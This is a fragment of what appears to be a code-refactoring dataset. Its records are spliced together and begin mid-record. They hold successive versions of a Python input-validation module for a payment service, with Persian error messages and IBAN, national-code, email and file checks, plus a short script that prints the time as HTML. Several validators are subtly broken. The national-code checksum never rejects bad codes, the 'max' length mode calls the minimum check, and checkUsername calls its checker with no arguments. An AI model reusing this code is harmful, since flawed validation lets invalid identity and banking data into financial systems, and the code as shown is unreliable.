self.addValidation({'field': field, 'value': data}, self.\n _check_with_mobileValidator)\n return self\n\n def checkEmail(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_emailValidator)\n return self\n\n def checkNotNone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_noneValidator)\n return self\n\n def checkFile(self, field, data, **options):\n self.addValidation({'field': field, 'value': data, 'options':\n options}, self._check_with_fileValidator)\n return self\n\n def checkIBAN(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IBANValidator)\n return self\n\n def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):\n data = {'userId': userId, 'subId': subId}\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_subMerchantBankAccountValidator)\n return self\n\n def checkDataLength(self, field, length, mode='equal', data='unAssigned'):\n if mode == 'equal':\n validatorFunction = self._check_with_equalDataLengthValidator\n if mode == 'min':\n validatorFunction = self._check_with_minDataLengthValidator\n if mode == 'max':\n validatorFunction = self._check_with_minDataLengthValidator\n self.addValidation({'field': field, 'value': data, 'length': length\n }, validatorFunction)\n return self\n\n def checkInputData(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_inputValidator)\n return self\n\n def checkTelephone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_phoneNumberValidator)\n return self\n\n def checkIsIbanTransferable(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IbanTransferable)\n return self\n\n def checkUsername(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_username())\n\n\nclass DataValidator:\n\n def __init__(self, data={}):\n self.fieldValidator = FieldValidator(data)\n self.objectValidator = ObjectValidator()\n self.errors = {}\n self.statusCode = 200\n\n def getValidatorsErrors(self):\n self.objectValidator.validate()\n self.fieldValidator.validate()\n for key in self.fieldValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.fieldValidator.getErrors()[key]\n self.statusCode = self.fieldValidator.statusCode\n for key in self.objectValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.objectValidator.getErrors()[key]\n self.statusCode = (self.objectValidator.statusCode if self.\n objectValidator.statusCode != 200 else self.statusCode)\n return self.errors\n\n def generateMessage(self):\n messages = []\n errorKeys = self.errors.keys()\n if 'email' in errorKeys:\n messages.append(' آدرس ایمیل نامعتبر است')\n if 'name' in errorKeys:\n messages.append('نام را وارد کنید')\n if 'username' in errorKeys:\n messages.append('نام کاربری را وارد کنید')\n if 'password' in errorKeys:\n messages.append('رمز عبور را وارد کنید')\n if 'mobile' in errorKeys:\n messages.append('تلفن همراه خود را وارد کنید.')\n if 'phone' in errorKeys:\n messages.append(\n 'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')\n if 'iban' in errorKeys or 'IBAN' in errorKeys:\n messages.append(\n 'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'\n )\n if 'user' in errorKeys:\n messages.append('لطفا وارد شوید')\n return messages\n",
"step-5": "import API.enum as enum\nimport re\n\nclass ObjectValidator():\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.statusCode = 200\n self.validationPipeline = []\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = ObjectValidator()\n return self\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def addValidation(self, data, validatorFunction):\n self.validationPipeline.append({\n 'data': data,\n 'validator': validatorFunction\n })\n\n def _check_with_authenticationValidator(self, data):\n if not data['user'].is_authenticated:\n self.setError(data['field'], enum.Error.UNAUTHORIZED.value)\n\n def _check_with_nonDuplicateObjectValidator(self, data):\n model = data['model']\n if model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.DUPLICATE_FIELDS.value)\n\n def _check_with_ObjectExistenceValidator(self, data):\n model = data['model']\n if not model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.GENERIC_OBJECT_NOT_FOUND.value)\n\n def checkNonDuplicateObject(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter': filter},\n self._check_with_nonDuplicateObjectValidator)\n return self\n\n def checkObjectExistence(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter': filter},\n self._check_with_ObjectExistenceValidator)\n return self\n\n def checkUserAuthentication(self, field, user):\n self.addValidation({'field': field, 'user': user},\n self._check_with_authenticationValidator)\n return self\n\n\n#\\b(?!(\\d)\\1{3})[13-9]{4}[1346-9][013-9]{5}\\b\n# postal code validation\n\n\nclass FieldValidator():\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.validationPipeline = []\n self.statusCode = 200\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = FieldValidator()\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.INVALID_FIELD_DATA.value)\n return self\n def addValidation(self, data, validatorFunction):\n if (data['value'] == 'unAssigned') and data['field'] in self.data.keys():\n data['value'] = self.data[data['field']]\n elif data['value'] == 'unAssigned' and data['field'] not in self.data.keys():\n data['value'] = None\n self.validationPipeline.append({\n 'data': data,\n 'validator': validatorFunction\n })\n\n def _check_with_typeValidator(self, data):\n if not isinstance(data['value'], data['type']):\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_nationalLegalCodeValidator(self, data):\n nationalLegalCode = data['value']\n result = 0\n validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]\n if len(nationalLegalCode) != 11:\n self.setError(data['field'], enum.Error.INVALID_NATIONAL_LEGAL_CODE.value)\n return\n for i in range(10):\n result += (int(nationalLegalCode[-2]) + 2 + int(nationalLegalCode[i])) * validationList[i]\n if result % 11 == 10:\n reminder = 0\n else:\n reminder = result % 11\n if reminder == int(nationalLegalCode[-1]):\n valid = True\n else:\n valid = False\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_NATIONAL_LEGAL_CODE.value)\n\n def _check_with_nationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if (r < 2 and r == int(nCode[9])) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n def _check_with_officer1NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if (r < 2 and r == int(nCode[9])) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n def _check_with_officer2NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if (r < 2 and r == int(nCode[9])) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_featuresValidator(self, data):\n for i in data['value']:\n if i not in [\"پلتفرم پرداخت در محل\", \"باشگاه مشتریان\", \"درگاه پرداخت اینترنتی\"]:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n break\n\n def _check_with_userNameValidator(self, data):\n username = re.match(r\"^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$\", data[\"value\"])\n if 'admin' in data['value'] or 'zibal' in data['value'] or username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def _check_with_phoneNumberValidator(self, data):\n if data['value'] is None or len(data) < 1:\n self.setError(data['field'], enum.Error.PHONE_INCORRECT_TEMPLATE.value)\n\n def _check_with_mobileValidator(self, data):\n mobileNumber = data['value']\n if mobileNumber is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match(r\"(^09[0-9]{9}$)\", mobileNumber)\n if match_object is None or mobileNumber is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_emailValidator(self, data):\n email = data['value']\n if email is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match(r\"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\", email)\n if match_object is None or email is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_noneValidator(self, data):\n if data['value'] is None or data['value'] == \"\":\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_fileValidator(self, data):\n\n file = data['value']\n field = data['field']\n if file is None:\n self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)\n return\n elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:\n self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)\n types = data['options'].get('types', None)\n valid = False\n if types is not None:\n for type in types:\n valid = valid or type in file.content_type\n if valid is False:\n self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)\n\n def _check_with_IBANValidator(self, data):\n iban = data['value']\n if len(iban)!=26 or not iban.startswith(\"IR\"):\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n return\n code = iban[4:]+iban[:4]\n code = code.replace('I','18').replace('R','27')\n if int(code)%97!=1:\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n\n def _check_with_subMerchantBankAccountValidator(self, data):\n if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID=data['value']['subId'], status=1).exists():\n self.setError(data['field'], enum.Error.IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)\n\n def _check_with_minDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) < data['length']:\n self.setError(data['field'], (enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_maxDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) > data['length']:\n self.setError(data['field'], (enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_equalDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) != data['length']:\n self.setError(data['field'], (enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_inputValidator(self, data):\n if data['value'] is None or len(data['value']) < 1:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_IbanTransferable(self, data):\n if data['value'][4:7]=='062' and data['value'][-13:-10]=='080':\n self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value)\n\n def _check_with_username(self, data):\n username = re.match(r\"^[a-zA-Z0-9_.-]+$\", data[\"value\"])\n if username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n #############################################################################\n\n def checkType(self, field, type, value=\"unAssigned\"):\n self.addValidation({'field': field, 'type': type, 'value': value}, self._check_with_typeValidator)\n return self\n\n def checkNationalLegalCode(self, field, code=\"unAssigned\"):\n self.addValidation({'field': field, 'value': code}, self._check_with_nationalLegalCodeValidator)\n return self\n\n def checkOfficer1NationalCode(self, field, code=\"unAssigned\"):\n self.addValidation({'field': field, 'value': code}, self._check_with_officer1NationalCodeValidator)\n return self\n\n def checkOfficer2NationalCode(self, field, code=\"unAssigned\"):\n self.addValidation({'field': field, 'value': code}, self._check_with_officer2NationalCodeValidator)\n return self\n\n def checkNationalCode(self, field, code=\"unAssigned\"):\n self.addValidation({'field': field, 'value': code}, self._check_with_nationalCodeValidator)\n return self\n\n def checkFeatures(self, field, features=\"unAssigned\"):\n self.addValidation({'field': field, 'value': features}, self._check_with_featuresValidator)\n return self\n\n def checkUserName(self, field, username=\"unAssigned\"):\n self.addValidation({'field': field, 'value': username}, self._check_with_userNameValidator)\n return self\n\n def checkPhone(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_phoneNumberValidator)\n return self\n\n def checkMobile(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_mobileValidator)\n return self\n\n def checkEmail(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_emailValidator)\n return self\n\n def checkNotNone(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_noneValidator)\n return self\n\n def checkFile(self, field, data, **options):\n self.addValidation({'field': field, 'value': data, 'options': options}, self._check_with_fileValidator)\n return self\n\n def checkIBAN(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_IBANValidator)\n return self\n\n def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):\n data = {\n 'userId': userId,\n 'subId': subId\n }\n self.addValidation({'field': field, 'value': data}, self._check_with_subMerchantBankAccountValidator)\n return self\n\n def checkDataLength(self, field, length,mode='equal', data=\"unAssigned\"):\n if mode == 'equal':\n validatorFunction = self._check_with_equalDataLengthValidator\n if mode == 'min':\n validatorFunction = self._check_with_minDataLengthValidator\n if mode == 'max':\n validatorFunction = self._check_with_minDataLengthValidator\n\n self.addValidation({'field': field, 'value': data, 'length': length}, validatorFunction)\n\n return self\n\n def checkInputData(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_inputValidator)\n return self\n\n def checkTelephone(self, field, data=\"unAssigned\"): ##TODO\n self.addValidation({'field': field, 'value': data}, self._check_with_phoneNumberValidator)\n return self\n\n def checkIsIbanTransferable(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_IbanTransferable)\n return self\n\n def checkUsername(self, field, data=\"unAssigned\"):\n self.addValidation({'field': field, 'value': data}, self._check_with_username())\n\n\nclass DataValidator:\n\n def __init__(self, data={}):\n self.fieldValidator = FieldValidator(data)\n self.objectValidator = ObjectValidator()\n self.errors = {}\n self.statusCode = 200\n\n def getValidatorsErrors(self):\n self.objectValidator.validate()\n self.fieldValidator.validate()\n for key in self.fieldValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []) + self.fieldValidator.getErrors()[key]\n self.statusCode = self.fieldValidator.statusCode\n for key in self.objectValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []) + self.objectValidator.getErrors()[key]\n self.statusCode = self.objectValidator.statusCode if self.objectValidator.statusCode != 200 else self.statusCode\n return self.errors\n\n def generateMessage(self):\n messages = []\n errorKeys = self.errors.keys()\n if 'email' in errorKeys:\n messages.append(' آدرس ایمیل نامعتبر است')\n\n if \"name\" in errorKeys :\n messages.append('نام را وارد کنید')\n\n if 'username' in errorKeys:\n messages.append('نام کاربری را وارد کنید')\n\n if 'password' in errorKeys:\n messages.append('رمز عبور را وارد کنید')\n\n if 'mobile' in errorKeys:\n messages.append('تلفن همراه خود را وارد کنید.')\n\n if 'phone' in errorKeys:\n messages.append('تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')\n if 'iban' in errorKeys or 'IBAN' in errorKeys:\n messages.append('شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله')\n if 'user' in errorKeys:\n messages.append('لطفا وارد شوید')\n\n return messages",
"step-ids": [
40,
58,
62,
63,
65
]
}
|
[
40,
58,
62,
63,
65
] |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""""""""""""""""""""""""""""""""""""""""""""""
" Filename: time.py
"
" Author: xss - callmexss@126.com
" Description: Show local time
" Create: 2018-07-02 20:20:17
"""""""""""""""""""""""""""""""""""""""""""""""
from datetime import datetime
print('''\
<html>
<body>
<p>Generated {0}</p>
</body>
</html>'''.format(datetime.now()))
|
normal
|
{
"blob_id": "e8eac1e4433eee769d317de9ba81d5181168fdca",
"index": 6293,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(\n \"\"\" <html>\n <body>\n <p>Generated {0}</p>\n </body>\n </html>\"\"\"\n .format(datetime.now()))\n",
"step-3": "<mask token>\nfrom datetime import datetime\nprint(\n \"\"\" <html>\n <body>\n <p>Generated {0}</p>\n </body>\n </html>\"\"\"\n .format(datetime.now()))\n",
"step-4": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\" Filename: time.py\n\"\n\" Author: xss - callmexss@126.com\n\" Description: Show local time\n\" Create: 2018-07-02 20:20:17\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nfrom datetime import datetime\n\n\nprint('''\\\n <html>\n <body>\n <p>Generated {0}</p>\n </body>\n </html>'''.format(datetime.now()))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.